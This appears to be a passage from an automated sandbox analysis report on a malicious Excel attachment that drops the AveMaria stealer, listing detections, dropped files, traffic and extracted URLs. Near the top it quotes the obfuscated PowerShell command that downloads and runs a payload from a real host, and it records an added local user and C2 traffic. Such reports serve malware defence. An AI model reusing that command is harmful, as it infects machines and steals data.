Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6472, ProcessCommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ProcessId: 1836

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108

Sigma detected: Group Modification Logging

Show sources

Source: Event Logs

Author: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -

Sigma detected: Local User Creation

Show sources

Source: Event Logs

Author: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: .mFDHma, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x2005f, data 7: -, data 8: .mFDHma, data 9: %%1793

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Avira: detection malicious, Label: TR/Redcap.ghjpt
Source: C:\Users\user\AppData\Local\Temp\Test1.txt	Avira: detection malicious, Label: TR/Redcap.ghjpt

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files\Microsoft DN1\sqlmap.dll	Metadefender: Detection: 22%			Perma Link
Source: C:\Program Files\Microsoft DN1\sqlmap.dll	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Show sources

Source: Telex06012020.xls

Virustotal: Detection: 12%

Perma Link

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Test1.txt	Joe Sandbox ML: detected

Source: 19.1.Test3.jpg.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 18.2.Test3.jpg.2ae0000.1.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 19.0.Test3.jpg.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 22.2.cmd.exe.5250000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.Test3.jpg.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 18.2.Test3.jpg.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 19.2.Test3.jpg.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,		18_2_00426ED0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,		18_2_00426B80

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
Source:	Binary string: RfxVmt.pdb source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbUGP source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Jump to behavior

Source: global traffic

DNS query: name: lankarecipes.com

Source: global traffic

TCP traffic: 192.168.2.4:49728 -> 192.185.236.165:80

Source: global traffic

TCP traffic: 192.168.2.4:49728 -> 192.185.236.165:80

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 37.46.150.86:5200

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic

HTTP traffic detected: GET /mages.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.86

Source: global traffic

HTTP traffic detected: GET /mages.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: lankarecipes.com

Source: PowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.dr	String found in binary or memory: http://lankarecipes.com/mages.jp
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.dr	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.office.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://augloop.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cdn.entity.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://cr.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://directory.services.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://graph.windows.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://login.windows.local
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://management.azure.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://management.azure.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
